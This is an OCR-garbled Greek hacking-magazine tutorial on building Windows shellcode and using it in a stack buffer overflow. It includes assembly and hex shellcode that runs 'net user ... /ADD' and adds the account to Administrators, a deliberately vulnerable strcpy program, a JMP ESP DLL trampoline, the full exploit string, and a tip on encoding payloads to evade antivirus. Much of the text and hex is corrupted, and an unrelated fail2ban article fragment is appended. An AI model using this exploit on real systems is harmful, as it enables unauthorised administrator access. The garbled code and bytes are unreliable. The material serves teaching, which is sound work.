που ξεκινὰ апо τη σελίδα 24, avri να δώσουμε στη συνάρτηση gets() ro string 


AAAAAAAAAABBBB \ x90 \x11\x40\ x00 
προκειµένου va калёбосне τη Functioni(), θέλουμε тора να δώσουμε кат! στο στιλ 
AAAAAAAAAABBBBEXECUTE USER CREATION CODE 


Και yia va μπαίνουμε σιγἁ біуа στο кліра, va πούμε OT! αναλόγως µε rov pen-tester 
nou θα ρωτήσετε то EXECUTE USER, CREATION. CODE εἶναι ro payload ἡ αλλιώς 
TO shellcode. 


Σηµείωση: О nnyaioc κὠδικας των παραδειγµάτων που χρησιμοποιούμε στο пароду 
ἀρθρο εἶναι διαθέσιμος апо τη διεύθυνση http://bit.ly/dhO34shellcode 


'Eva shellcode апо коута 


Па να καταλάβουμε καλύτερα τι εἶναι Eva shellcode ας ξεκινήσουμε апо Eva na- 
ράδειγµα σε κὠδικα Assembly, το опоіо εμφανίζει Eva απλό μήνυμα µέσα σ' Eva 
MessageBox. Όπως unopsire να δείτε και στον κὠδικα λίγο παρακάτω (δύο γραμμές 
πριν ano το τέλος TOU), το εν λόγω μήνυμα εἶναι το "deltaHacker" (χωρἰς τα εισα- 
YWYIKQ). 


1. Το έχετε nón διαβάσει, ἑτσι δεν εἶναι; 
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Πριν ασχοληθούμε µε τον κὠδικα Assembly ας θυμηθούμε Ori για να δηµιουρ- 
γήσουμε Eva MessageBox οφείλουμε να κάνουμε ша κλήση прос τη συνάρτηση 
MessageBoxA, η onoia катоікеі μέσα στο αρχείο user32.dll (C:\Windows\system32\ 
user32.dll). Πιο συγκεκριµένα, Aoinóv, για την κλήση στη MessageBoxA θα πρέπει 
να φορτώσουμε, µέσω της εντολἠς LoadLibraryA, τη βιβλιοθήκη user32.dll, και μέσα 
σ' αυτἠ να evronicoupe τη διεύθυνση της MessageBoxA (pe τη βοήθεια της εντολἠς 
GetProcAddress). Φυσικά, δεν πρέπει να ξεχνάμε Ori yia να φορτώσει η βιβλιοθήκη 
user32.dll οφείλουμε να καλέσουµε τη συνάρτηση LoadLibraryA (κατοικεἰ μέσα στο 
αρχείο kernel32.dll) και va της περάσουμε ως παράμετρο το ὀνομα της βιβλιοθήκης 
DLL (eire user32.dll cite kernel32.dll, oro nAaicio της συζήτησής рас). 


Δείτε τα αποτελέσµατα nou πήραμε µε το εργαλεἰο get the address.exe? oro oÙ- 
στηµα µε Windows 8.1 ὀπου κάναμε τους πειραματισμούς µας: 


LoadLibraryA, located at address 0х7558а669 in Kernel32.dll 
GetProcAddress, located at address 0x7558980c in Kernel32.dll 
ExitProcess, located at address 0x75597f64 in Kernel32.dll 


Στο κομμάτι FunctionReturn (µε £vrova γράμματα) στον κὠδικα nou παρατίθεται 
λίγο παρακάτω, нета το пёрасца της διεύθυνσης 0x7558980c στον καταχωρη- 
τὴ ebx εἶναι φανερὀ бт! αυτός теліка θα περιέχει τη διεύθυνση της συνάρτησης 
MessageBoxA, η οποία ὁπως εἶπαμε εἶναι πλέον η кора υπεύθυνη για την εμφάνιση 
του μηνύματος. 


Λάβετε υπόψη бт οι συναρτήσεις LoadLibraryA, GetProcAddress και ExitProcess, τις 
οποίες χρησιμοποιούμε στο παράδειγµα нас, ¿xouv διαφορετικὲς διευθύνσεις στις 
διάφορες εκδόσεις των Windows. Συνεπώς, το παράδειγµα shellcode που δίνουμε 
δεν θα λειτουργήσει σε ἄλλη ἐκδοση των Windows, µιας και εἶναι επὀµενο ÓTI οι 
συναρτήσεις θα βρίσκονται σε біафоретікёс διευθύνεις. Αυτός εἶναι κι ο λόγος, δη- 
λαδή, yia τον οποίο πολλά ётоіра shellcodes που διατίθενται στο Internet naiZouv 
σε συγκεκριμένες εκδόσεις των Windows κι Ох! σε ὀλες. 


Αν χρησιμοποιεῖτε διαφορετικἡ ἐκδοση των Windows τότε εννοείται πως πρέπει va 
αλλάξετε астёс τις τρεις διευθύνσεις µε дл! ισχύει στο λειτουργικὀ σας. Το εργαλεἰο 
get the address.exe θα σας φανεὶ χρήσιμο. 


mov ебх, 0x7593a669 
mov ebx, 0x7558980c 
mov eax, 0x75597f64 
[SECTION .text] 
BITS 32 

global start 


start: 


xor eax,eax 3 Μηδενισμός tuv καταχωρητών 


2. Βρείτε το στο shellcode src.zip, nou θα πάρετε апо το http://bit.ly/dh034shellcode 
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xor ebx,ebx 
хог ecx,ecx 


xor edx,edx 


jmp short GetLibrary 


GetLibraryReturn: 


pop ecx 


mov ебх, 0x7593a669 
push ecx 


call ebx 


Jmp short FunctionName 


FunctionReturn: 


pop ecx 


push ecx 
push eax 
mov ebx, 0x7558980c 
call ebx 


Jmp short Message 


MessageReturn: 
pop ecx 


xor edx, edx 


push edx 
push ecx 
push ecx 
push edx 


call eax 


ender: 
xor edx,edx 


push eax 


αλλά στην πράξη! 
PPP 


; pop address of the Library string 
; Pass library string as parameter to 
LoadLibraryA, and call LoadLibraryA 


LoadLibraryA (libraryname) 
; push parameter to LoadLibraryA 


; call LoadLibraryA - eax holds return value 
Retrieve the address of the function name string 


set below. 


; pop address of the function string 
; Pass function string as parameter to 
LoadLibraryA, and call LoadLibraryA 


; push string as the second parameter 
; pass first parameter 
; GetProcAddress (hmodule, functionname) 


; eax now holds address of MessageBoxA 


; get the message string 
; clear edx value 
; Push the parameters onto the stack: 
; MB OK 

sei tla 

; message 

; NULL window handle 
; MessageBoxA(windowhandle,msg,title,type) 


; empty edx out 


; move address of MessageBoxA onto stack 
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p" = 


УНАФКЕЕ 


ΧΧΧ ΧλΧλλλλλΧλλλλλλλλλλΑλλλλλλλλΑλλλΑλλλλλΧλλΧλλ OOOO OOO OOOO OOOO OOOO А 


mov eax, 0x75597f64 3 ExitProcess(exitcode) ; 
call eax 3 exit cleanly so we don't crash parent 
GetLibrary: ; Define location and string 


3 constant "user32.dll" 
call GetLibraryReturn ; push address of next byte onto stack, 


; and return to GetLibraryReturn 


db 'user32.dll' ; String constant 
db 0x00 ; terminate string with null 
FunctionName: ; Define location and string constant 


; MessageBoxA" 


call FunctionReturn ; push address of next byte onto stack, and return 
; to FunctionReturn 

db 'MessageBoxA' 3 string constant 

db 0x00 ; terminate string with null 

Message: ; Define location and string constant "Hey" 

call MessageReturn ; push address of next byte onto stack, 


; and return to MessageReturn 
db 'deltaHacker!' ; String constant 


db 0x00 ; terminate string with null 


Μεταγλώττιση koóika Assembly 


Με την προὐπόθεση От! ἐχουμε αποθηκεύσει τον κὠδικα Assembly σε Eva αρχείο 
ονόματι msgbox-win8.asm, апо το Command Prompt των Windows δίνουμε: 


nasm -f bin -о msgbox-win8.bin msgbox-win8.asm 


Мета την επιτυχἠ εκτέλεση της παραπάνω εντολἠς Ва παραχθεἰ ro αρχείο msgbox- 
win8.bin. Av το ανοἰξουµε µε kánoiov hex editor, θα δούμε кайт! σαν την εικόνα 1. 


msgbox-win8.bin 


2 


Εικόνα 1. 
Ανοίγοντας µε ἑναν HexEditor ro binary αρχείο που μόλις параүйүаџє. To shellcode εἶναι ὁλοι αυτοί οι 
δεκαεξαδικοί χαρακτήρες... 
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Та shellcodes, αλλά στην праёп! 
PTT 


Το прото рас shellcode εἶναι μπροστά µας! Ау ropa πληκτρολογήσουμµε 
xxd -i msgbox-win8.bin 


θα πάρουμε, μεταξὺ ἄλλων, τους xapakrrjpec rou shellcode αλλά ре "Ox" μπροστὰ 
ano каде δεκαεξαδικὀ χαρακτήρα. 


GeorgeW@Jungle ~/ShellCode 

$ xxd -i msgbox-win8.bin 

unsigned char msgbox win8 bin[] = í 
0x31, @xc@, 0x31, Oxdb, ΘΧ31, Өхс9, 0x31, Oxd2, Oxeb, дх2а, 0x59, Oxbb, 
0x69, 0xa6, 0x58, 0x75, 0x51, Oxff, Oxd3, Oxeb, ΘΧ2Έ, 0x59, 0x51, 0x50, 
Oxbb, θχθς, 0x98, 0x58, 0x75, Oxff, Өхаз, Oxeb, 0x34, 0x59, 0x31, Oxd2, 
0x52, 0x51, 0x51, 0x52, Oxff, OxdO, 0x31, Oxd2, 0x50, Oxb8, 0x64, Ox7f, 
0x59, 0x75, Oxff, OxdO, θχ68, Oxd1, Oxff, Oxff, Oxff, 0x75, 0x73, 0x65, 
0x72, 0x33, 0x32, 0Ox2e, 0x64, θχ6ς, Өхбс, 0x00, дхе8, Oxcc, Oxff, Oxff, 
Oxff, Ox4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, Ox6f, 0x78, 0x41, 
0x00, 0xe8, Oxc7, Oxff, Oxff, Oxff, 0x44, 0x65, Ox6c, Ox74, 0x61, 0x48, 
0x61, 0x63, 0x6b, 0x65, 0x72, 0x21, 0x00 

}; 


unsigned int msgbox win8 bin len = 103; 


Προκειμένου v' απαλλαγούμε απο ra "Ох" (τα οποία δεν прёпеі va εἶναι µέρος του 
shellcode) μπορούμε να χρησιμοποιήσουμε το εργαλείο xxd-shellcode.sh ro οποίο, 
όπως και θα δείτε, a~aipei ra "Ox" KI ἐτσι έχουμε επιτέλους στα χέρια рас ro καθα- 
ротато shellcode: 


GeorgeW@Jungle ~/ShellCode 
$ ./xxd-shellcode.sh msgbox-win8.bin 


\x31\xc0@\x31\xdb\x31\xc9\x31\xd2\xeb\x2a\x59\xbb\x69\xa6\x58\X75\x51\xfF\ 
xd3\xeb\x2¥\x59\x51\x50\xbb\xOc \x98\x58\xX75\xfFf\xd3\xeb\x34\x59\x31\xd2\ 
X52\xX51\x51\x52\xfF\xd0\x31\xd2\x50\xb8\x64\x7F\x59\x75\xfFf\xde\xe8\xd1\ 
XFF\XFF\XFF\X75\X73\x65\xX72\x33\x32\x2e\x64\x6C\x6c\x00\xe8\xcc\xFF\xFF\ 
XFF\x4d\x65\x73\x73\x61\x67\x65\x42\x6F\xX78\x41\x00\ xe8\xc7\xFF\XFFI\XFF\ 
X44\x65\x6cC\xX74\x61\x48\x61\x63\x6b\x65\x72\x21\x00 


Н πρώτη δοκιµἠ 


To καθαρὀ shellcode nou μόλις парауауаце μπορούμε va ro βάλουμε στον ακόλουθο 
κὠδικα C++, ως περιεχόµενο rnc μεταβλητἠς code (τύπου Array): 


char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x2a\x59\xbb\x69\xa6\ 
x58\X75\x51\xfF\xd3\xeb\x2F\x59\x51\x50\xbb\xO0c\x98\x58\x75\xfFf\xd3\xeb\ 
X34\x59\x31\xd2\x52\x51\x51\x52\xfF\xd0\x31\xd2\x50\xb8\x64\x7F\x59\x75\ 
xf F\xd0\xe8\xd1\xfFFf\xFF\XFF\X75\x73\x65\xX72\xX33\x32\x2e\x64\x6c\x6cC\xe0\ 
xe8\xcc\xfF\xfF\XFF\xX4d\x65 \x73\x73\x61\x67\x65\x42\x6F\x78\x41\x00\xe8\ 
XC7\XFF\XFF\XFF\X44\x65\x6c\xX74\x61\x48\x61\x63\x6b\x65\x72\x21\x@0" ; 


int main(int argc, char **argv) 
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ANNL 


{ 
int (*func)(); 
func = (int (*)()) code; 
(int)(*func)(); 

ў 


Ау бла ἐχουν γίνει σωστά, µετά τη μεταγλώττιση κι εκτέλεση TOU κὠδικα θα пароџ- 
ре µια εικόνα σαν τη 2. 


C ~/ShellCode 


DeltaHacker! 


Εικόνα 2. 

Н εκτέλεση Tou shellcode πέτυχε! Ας κρατήσουμε στο μυαλό µας πάντως 
ότι το συγκεκριμένο shellcode ἐχει апла προστεθεί στο αρχείο С++, єпо- 
μένως δεν μιλάμε για σενάριο στο πλαίσιο µιας αληθινής επίθεσης. 


Βέβαια ο σκοπὸς µας δεν εἶναι να φτιάξουμε Eva shellcode που θα περάσουμε µέσα 
σ' èva executable, To onoio αφού εκτελέσουµε θα πάρουμε Eva апло μήνυμα στην 
οθόνη. Το παράδειγµα που μόλις δώσαμε εἶχε кабара εκπαιδευτικὀ χαρακτήρα, WOTE 
σε πρώτη φάση να μάθουμε noc φτιάχνεται Eva shellcode. AUTO που ἐχει πραγµα- 
тіко ενδιαφέρον για τη συνέχεια εἶναι να συνδυάσουµε Eva stack overflow κι Eva 
shellcode, ὥστε теліка να εκτελἐσουµε µη εξουσιοδοτημένο κὠδικα. Όπως npoava- 
феране, το shellcode µας 8a δημιουργεἰ ἑναν νέο χρήστη στο σύστημα. 


Па τη συνέχεια θα υποθέσουμε бт! еруасднасте στα Windows 7 κι ο χρήστης µας 
ἐχει NON δικαιώματα administrator. Διαφορετικά, αν δηλαδή δεν ἐχει, θα χρειαστεὶ 
να αποκλἰνουµε στα μονοπάτια του privilege escalation кі ἐτσι θα χάσουμε το ωραίο 
κομμάτι της ανάλυσης, της δημιουργίας και της εκτέλεσης ενὸς shellcode. (Σκεφτεί- 
τε апо тора και το ηθικὀ δίδαγμα: Ποτὲ δεν πρέπει να εργαζὀµαστε апо ro λογα- 
расо ενὸς administrator, ектос кі αν εἶναι απολύτως απαραίτητο. Ακόμη και τότε, 
καλὸ εἶναι να επιστρἐφουµε στο λογαριασμὸ еудс µη-εξουσιοδοτημένου χρήστη то 
συντομότερο δυνατὸν.) 


Κατέχοντας λοιπὸν ὁλο το απαραίτητο υπόβαθρο, ας παρουσιάσουμε τον κὠδικα 
σε Assembly για τη δηµιουργἰα ενός χρήστη. Ακολούθως, θα πάρουμε το shellcode 
TOU κὠδικα. AUTO που δεν θα πρέπει να ξεχάσουμε, ὁπως ἠδη ἐχουμε nei, εἶναι να 
βεβαιωθούμε от! έχουμε βάλει σωστὰ τις διευθύνσεις για τις συναρτήσεις WinExec 
και ExitProcess, αφού ενδεχομένως θα διαφέρουν ακόµη κι όταν μιλάμε για την ἰδια 
ἐκδοση των Windows. Όταν, π.χ., ἐχουμε Windows update, κάποιες φορὲς αναβαθ- 
рісетаі και το kernel32.dll και πλέον δεν ισχύουν οι паліёс διεθύνσεις που ξέραμε. 
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Та shellcodes, 


Κώδικας για δηµιουργία νέου χρήστη 


Παραθέτουµε κὠδικα Assembly για τη δημιουργία ενὸς χρήστη ονόματι deltaHacker, 
σε ἑνα σύστημα ре Windows 7 (αρχείο adduser-windows7.asm). 


[Section .text] 
BITS 32 
global start 


.start: 


jmp short GetCommand 


CommandReturn: 


pop ebx 

хог eax,eax 

push eax 

push ebx 

mov ebx,0x7721f22e 
call ebx 


Xor eax,eax 


push eax 
mov ебх, 0x771ebc9a 


call ebx 


GetCommand: 


call CommandReturn 


αλλά στην πράξη! 
MP 


3 


D 


2 


; jump to the location of the command string 


Define a label to call so that string address 
is pushed onto stack 


ebx now points to the string 


empties out eax 


; push null onto stack as empty parameter value 


; push the command string onto the stack 


;place address of WinExec into ebx 


;call WinExec(path , showcode ) 


. 
2 

. 
2 


2 


2 


3 


zero the register again to clear WinExec 
return value (return values аге often 
returned into eax) 


push null onto stack as empty parameter value 
place address of ExitProcess into ebx 


call ExitProcess(@); 


Define label for location of command string 


; call the return label so the return address 


(location of string) is pushed onto stack 


db "cmd.exe /c net user deltahacker delta /ADD && net localgroup 
Administrators /ADD deltahacker" 


db 0x00 


3 


3 


; Write the raw bytes into the shellcode 
; that represent our string. 


j Terminate our string with a null character. 


Όλη η ουσία rou κὠδικα εἶναι η προτελευταἰα γραμμή η οποία, ὁπως φαίνεται, EXE! 
hardcoded ὁλο το συντακτικὀ της εντολἠς net user, µε την οποία δημιουργούμε 
χρήστες στα Windows. Εἶναι φανερό бт! όλη αυτή η γραμμή да unei στο stack και 
θα εκτελεστεἰ όταν γίνει το stack overflow. Όλα αυτά ὀμως µε την ефарроуў µιας 
μικρής, επιπρὀσθετης τεχνικἠς που χρησιμοποιείται για τέτοιες περιπτώσεις και την 


οποία θα δούµε σε λἰγο. 


51 


@KER 


ΝΝΝσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσσςςς 


Εξαγωγἠ του shellcode 
Αφού δημιουργήσουμε το αρχεἰο .bin πληκτρολογώντας την εντολἠ 
nasm -f bin -o adduser-windows7.bin adduser-windows7.asm 


χρησιμοποιώντας ro xxd-shellcode.sh naipvouue ro παρακάτω shellcode anaAAay- 
рёуо ano ra еуохЛптіка "Ox": 
GeorgeW@Jungle ~/ShellCode 
$ ./xxd-shellcode.sh adduser-windows7.bin 
\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x2e\xf2\x21\x77\xff\xd3\x31\xc@\x50\xbb\ 
x9a\xbc\x1e\x77\xff\xd3\xe8\xe5\xfFf\xfF\xXFfF\xX63\x6d\x64\x2e\x65\x78\x65\ 
X20\x2F\x63\x20\x6e\x65\xX74\xX20\X75\x73\x65\X72\X20\x64\x65\x6C\x74\x61\ 
x68\x61\x63\x6b\x65\xX72\x20\x64\x65 \x6c\x74\xX61\xX20\x2F\x41\x44\x44\x20\ 
х26\х26\х20\хбе\хб5\х74\х20\хбс\хб#\х63\хб1\хбс\х67\х72\х6#\х75\х70\х20\ 
х41\х64\хба\хб9\хбе\хб9\х73\х74\х72\х61\х74\х6#\х72\х73\х20\х2#\х41\х44\ 
x44\x20\x64\x65\x6c\x74\x61\x68\x61\x63\x6b\x65\x72\x0e 


GeorgeW@Jungle ~/ShellCode 
$ 


Αποθηκεύουµμε ro shellcode бе Eva αρχείο text και фроутісосне va διαγράψουµε бла 
та Ух. (Όχι µε το уёрі, φυσικά, αλλά αντικαθιστώντας µέσα ano то Notepad ro σύμ- 
βολο \х ие TOV KEVO χαρακτήρα.) Θα ἐχουμε ETO! το παρακάτω, "ορφανό" shellcode: 


eb165b31c05053bb2ef22177ffd331c050bb9abc1e77ffd3e8e5ffffff6364d642e6578 
65202f632066657420757365722064656c74616861636b65722064656c7461202f4144 
44202626206e6574206c6f63616c67726f757020416464d69666973747261746f727320 
2f4144442064656c74616861636b657200 


Το παραπάνω string πρέπει va εἶναι στην ióia γραμμή. Ακολουθούν о κὠδικας (σε 
C++) και η βιβλιοθήκη που 8a προκαλέσουν stack overflow και θα ανακατευθύνουν 
τη pon στο shellcode µας. 


Main code 
#include <stdio.h> 
#include <string.h> 
#include <windows.h> 
HINSTANCE hDLL = LoadLibrary("MyDLL.DLL") ; 


int main(int argc, char **argv) 


{ 
char string[16]=""; 
strcpy(string,argv[1]); 
} 
DLL code 


include "dll.h" 
#pragma data seg ("shared") 
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Та shellcodes, αλλά στην праёп! 
PPP 


#pragma data seg () 
#pragma comment (linker, "/SECTION: shared, RWS") 
int WINAPI DllMain (HINSTANCE hInstance, DWORD fdwReason, PVOID 


pvReserved) 
{ 
return TRUE ; 
j 
EXPORT char *VaultEnumerateVaults () 
{ 
. asm("JMP XESP"); 
} 


Λίγη θεωρία yia rr DLL 


To σημείο στο οποίο θα πρέπει va δοθεἰ ιδιαϊτερη προσοχὴ εἶναι το κομμάτι Export 
στον κὠδικα DLL, εκεὶ δηλαδή που υπάρχει inline Assembly µε την εντολὴ JMP 
%ESP. Εἶναι πολύ σημαντικὀ το σημείο αυτό, διότι αφού εκτελεστεἰ η εντολἠ 
strcpy(string,argv[1]) бло το argument που θα δώσουμε στη μεταβλητἠ string, δη- 
Aaór| το 


AAAAAAAAAABBBBEXECUTE USER CREATION CODE, 


θα πάει στο stack. Συγκεκριµένα, μετὰ τη διεύθυνση επιστροφἠς θα βρίσκεται то 
shellcode µας. Орос ті θα βρούμε στη διεύθυνση επιστροφἠς αν κάνουμε debugging 
µε τον αγαπημένο Immunity Debugger; Θα βρούμε φυσικά το EntryPoint της DLL 
μας, η οποία ουσιαστικά δείχνει ξανά στον ESP διότι θέλουμε va EKTEAEOTEI το 
shellcode nou βρίσκεται παρακάτω (στο exploit space, ὁπως λέμε). Προκειμένου va 
βρούμε то EntryPoint της DLL --και ειδικότερα τη διεύθυνση της εντολἠς JMP ESP—, 
арке! να βάλουμε Eva breakpoint στο κυρίως µέρος του προγράµµατος, εκεἰ που 
φορτώνεται η DLL. Μόλις фортодеі --ἐχουμε σταματήσει µε [F8] στη διεύθυνση 
0x401590, ὁπως φαίνεται στην εικὀνα 3— στο πάνω μέρος των επιλογών μπορούμε 
va πατήσουμε το KOUUNI µε το γράμμα "m" (απο το memory). Αμέσως θα εμφανιστεὶ 
éva παράθυρο µε ὁπι υπάρχει ενεργὀ στη μνήμη (memory тар). Όπως θα δούμε, 
εκεὶ βρίσκεται ενεργἡ και η DLL μας! Αν μπούμε στο .text κομμάτι (µε διπλὸ κλικ), 
όπου ano εκεἰ ξεκινάει και το EntryPoint σε Eva εκτελἑσιµο αρχεἰο (EXE ἡ DLL), κι 
αναζητήσουμε την εντολἠ JMP, θα δούμε OT! βρίσκεται στη διεύθυνση 610C11DF. 
Κρατάμε λοιπόν οπωσδήποτε στο μυαλὸ рас τη διεύθυνση αυτή, γιατἰ θα την Tono- 
θετήσουμε μπροστά ano то payload μας. Пат! άραγε; :) 


Ἔτσι, μόλις ο υπολογιστής συμβουλευτεὶ τον καταχωρητἠ ЕВР για το ποια εἶναι η 
διεύθυνση επιστροφἠς, о ЕВР θα rou πει ότι n return address εἶναι η DF110C61. Έλα 
όμως που η διεύθυνση αυτή eivai στην ουσία το EntryPoint της DLL, η οποία практі- 
ка δείχνει ξανὰ στον ESP... (JMP ESP). 


О véoc ESP, λοιπόν, θα ἐχει τη διεύθυνση 22FEDO και η επόμενη προς εκτέλεση 
εντολή, ὁπως δείχνει και ο ΕΙΡ (Instruction Pointer), εἶναι στη διεύθυνση 22FEDO 
опоо, πρακτικά, εἶναι το exploit space. Bingo! Μόλις εκτελέσαμµε ro shellcode µας. 
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УНАФКЕЕ 


ANNL NAAN 


M] Memory map 


Address |Size Section i ре] Access | Initial|Mapped as 


[D] Dump - dll: text 610C1000..610C1FFF 
610C11CF 
618C11D68 

70 ûC ΕΕΕΕΘΙ CIC HIDE 


= "911.911" 
LoadL ibraryR 


9 А jS: CESP+41, GFFFF 

Εικόνα 3. 

ΣΤΟ memory map του Immunity Debugger, ύστερα апо τη φόρτωση της DLL 
και το σταµάτηµα µε σχετικό breakpoint, βλέπουμε στο .text κομμάτι, στο 
οποίο και βρίσκεται το Entrypoint της DLL, ὁτι η διεύθυνση 610C11DF εἰναι 
αυτή που ψάχνουμε. Πράγματι, περιέχει την εντολή JMP ESP που εἰναι και то 
trick για то exploitation. 


DWORD PTR 
DWORD PTR 
DWORD PTR 
DWORD PTR 
EAX, DWORD 
EAX, 4 


DUGRD PTR 
EAX, DWORD 
DWORD PTR 


EAX, Ø 


strcpy 


NSH ЕВР 
ΕΒΡ, ESP 
SP. 18 
DUORD PTR SS: CEBP+8), 1 
DWORD PTR 55: CEBP+C), OFFFF 
DWORD PTR 55: [ESP], 
EAX 


LoadLibraryA 


Εικόνα 4. 

О καταχωρητής ESP δείχνει στη διεύθυνση Ox22FECC, η οποία EXE! ως περιε- 
χόμενο τη διεύθυνση 610C11DF. Μόλις εκτελεστεί, η διεύθυνση αυτή θα δείξει 
στον "καινούργιο" ESP κι έτσι θα εκτελεστεί ro payload nou βρίσκεται апо τη 
διεύθυνση Ox22FECC και ката. 
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Та shellcodes, αλλά στην πράξη! 
MP 


паэ за ου κ.  -——mmAX — Е πα 


πεν Debug Plugins ImmLib Options Window Help Jobs 
Ы «χρι Яг ei lemtwhcPkbzr 


Εικόνα 5. 

Н evToAn JMP ESP πράγματι εκτελέστηκε. Πλέον, o νέος 
ESP ἐχει τη διεύθυνση Ox22FEDO (ακριβώς като апо τη 
διεύθυνση Ox22FECC). Εκεί βρίσκεται ro shellcode ro 
οποίο πρὀκεται αµέσως τώρα να εκτελεστεί. 


Μετατροπή rou payload σε μορφή ASCII 


Αφού διαπιστώσαμε Ori η διεύθυνση της εντολἠς JMP ESP εἶναι η 610C11DF, θα την 
τοποθετήσουμε τώρα μπροστὰ ano ro payload — ανάποδα, φυσικἁ. Έτσι, θα xou- 
µε το ακὀλουθο string. Παρατηρήστε ori εἶναι ακριβώς то ἰδιο µε асто που εἰχαμε 
εξαγάγει архіка, πλὴν ὁμως, ropa ἐχουμε μπροστὰ (ανάποδα) τη διεύθυνση που 
προαναφέραμε (AUT µε ro κὀκκινο χρώμα). 


| 1eb165b31c05053bb2ef22177ffd331c050bb9abc1e77ffd3e8e5ffffff636d642 
e657865202f63206e657420757365722064656c74616861636b65722064656c7461202f41 
444420262206e6574206c6f63616c67726f75702041646d696e6973747261746f7273202f 
4144442064656c74616861636b657200 


Σηµείωση: To string εἶναι σε µια γραμμὴ και μόνο. 


Ме τη βοήθεια ενὸς Hex to ASCII converter, рпетатрёпосце тора το παραπάνω string 
σε ASCII μορφή. Θα πάρουμε Eva αποτέλεσμα σαν το ακὀλουθο: 


fiaé[1APS».ó!wyÓ1AP»34-wyÓeáyyycmd.exe /c net user deltahacker delta /ADD 
&& net localgroup Administrators /ADD deltahackerv 


(Μη θορυβηθεἰτε апо τα "κινέζικα" στη μορφὴ ASCII nou θα πάρετε.) 
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Y НАФКЕ 


ANN 


о [m «хо ІІ sf lemtwhcPkbztr.. «Ιώ ας 


T η — SP ^ |Registers (FPU) 


DWORD PTR 
DWORD P 


EDI а 
EDI,DUORD PTR DS: CESI+EBP#4] 
CALL EDI 


Address [Нех dum 


Εικόνα 6. 

O debugger βρίσκεται ἤδη στη διεύθυνση Ox22FEDO και εν μία pinn θα εκτελέσει TO 
shellcode! Το περιεχόµενο (ката δεξιά) της διεύθυνσης Ox22FEDO εἰναι FCE48166. Είναι ἰδιο 
(αν διαβαστεί ανάποδα) ие το περιεχόµενο της διεύθυνσης Ox22FEDO (πάνω αριστερά) κ.ο.κ. 


Н opa rou exploitation 
Ξεκινάμε тора апо το ακόλουθο προγραμματάκι, σε С++: 
#include <stdio.h> 
#include <string.h> 
#include <windows.h> 
HINSTANCE hDLL = LoadLibrary("MyDLL.DLL"); 
int main(int argc, char **argv) 


{ 
char string[16]=""; 


strcpy(string,argv[1]); 
] 


Μεταγλωττίζουμε κι εκτελούμε. Ас προκαλέσουµε Eva buffer overflow δίνοντας, ap- 
XIKG, το string 


AAAAAAAAAAAAAAAABBBBBBBBCCCC 
5B 


Та shellcodes, αλλά στην πράξη! 
PP 


δηλαδἠ 16 φορὲς rov χαρακτήρα A, 8 φορὲς ro χαρακτήρα B και 4 φορὲς ro xapa- 
κτἠρα C. Πριν πατήσουμε To [Enter] παραθέτουμε (κολλητά και μέσα бе αυτάκια " ") 
την ASCII μορφή rou payload: 


AAAAAAAAAAAAAAAABBBBBBBBCCCC" баё [ TÀPS» . 6! wyÓ1AP»34-wyÓeáyyycmd.exe /c 
net user deltahacker delta /ADD && net localgroup Administrators /ADD 
deltahackerv" 


Συγχαρητήρια, ο χρήστης deltahacker μόλις δημιουργήθηκε στο Windows 7 σύστη- 
μά σας! 


Προτάσεις για τη συ- 
νέχεια 


Ауті επιλόγου θέλαμε να 
σας αφήσουμε µε μερικὲς 
σκέψεις για περαιτέρω 
αναζήτηση, μελέτη και 
πειραματισμὀ. 


е Аркета κακόβουλα 
shellcode patterns 


γίνονται αντιλη- 

рага апо та . про- Εικόνα 7. 
γράμματα antivirus. Н πιο ευτυχής στιγµή! О χρήστης ие username 
Υπάρχουν ωστόσο deltahacker προστέθηκε στο σύνολο των 


εργαλεία та οποία ενεργών χρηστών του συστήµατος. 


κωδικοποιούν τα — Т... 
shellcodes. To Metasploit Framework, για παράδειγµα, διαθέτει τα λεγόμενα 
ShellCode Encoders. Παρεμπιπτόντως, η καλύτερη μέθοδος κωδικοποίησης 
στο Metasploit εἶναι η Shikata Ga Маі. Πα την αποτελεσματικἠὴ κωδικοποίηση 
payloads, фоте να µην εἶναι εὐκολα ανιχνεύσιμα апо antivirus, μπορείτε va 
διαβάσετε και στο σχετικὀ άρθρο που αρχίζει апо τη σελἰδα 74 του τεύχος 025 
(http: //deltahacker.gr/?p-9975). 


e Στο exploitation του παραδεἰγµατος χρησιμοποιήσαμε ша εξωτερικἡ DLL, της 
οποίας ro EntryPoint έδειχνε εκ νέου στον ESP (εντολἠ JMP %ESP). Avri της 
εξωτερικἠς DLL, µπορεἰ η JMP ESP va ενσωµατωθεἰ μέσα στον κύριο κὠδικα 
του προγράµµατος; 


е То payload "γίνεται бекто", στην ουσία, απο ro executable file, και εκτελείται 
στο stack του μηχανήματος. Μπορούμε ro payload να το στείλουμε σε Eva 
executable file nou βρίσκεται σε κἄποιο απομακρυσμένο μηχάνημα; Αν ναι, 
ποιους αμυντικούς μηχανισμούς πρέπει να ενεργοποιήσουµε ὥστε να προστα- 
τευόμαστε апо παρόμοιες απὀπειρες; 


ο Βλέποντας va shellcode, μπορούμε να καταλάβουμε τι κάνει; Ποια εἶναι η õi- 
абікабіа που πρέπει να ακολουθήσουμε, προκειµένου να εντοπἰσουµε πιθανἠ 
κακόβουλη συμπεριφορά; 


ο Προσπαθήστε να φορτώσετε Eva executable file στον debugger (δοκιμάστε 
τα EXE των παραδειγμάτων µας). Мета τη φόρτωση, δίπλα ano τις εντολὲς 
Assembly υπάρχουν τα λεγόμενα opcodes. Βλέπετε κάποια ομοιότητα µε τα 
παραγόμενα shellcodes; 
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$111: Beginner 


Tags: failcban, iptables, SSH, regular expressions 


by Spir@l Evoluti@n 


O επιµένων... κλειδώνεται απέξω 


Τι θα λέγατε αν катафёруане va σπάσουµε τα νεύρα σε ὀσους 
πραγματοποιούν επιθέσεις brute force ora μηχανήματὰ µας; Ναι, σωστά 
διαβάσατε. Δεν σκοπεύουµε να απενεργοποιήσουµε την υπηρεσία στην οποία 


επιτίθενται, ойт να KPUWOUPE το нпхаупна µας µε κάποιον GAAo τρόπο. 
Oa φροντίσουμε днос για το αυτόματο μπλοκάρισµα ὅσων πραγματοποιούν 
απανωτὲς και EVOXANTIKEG συνδέσεις (15 


Ü entuévov.. κλειδώνεται απέξω 
LP 


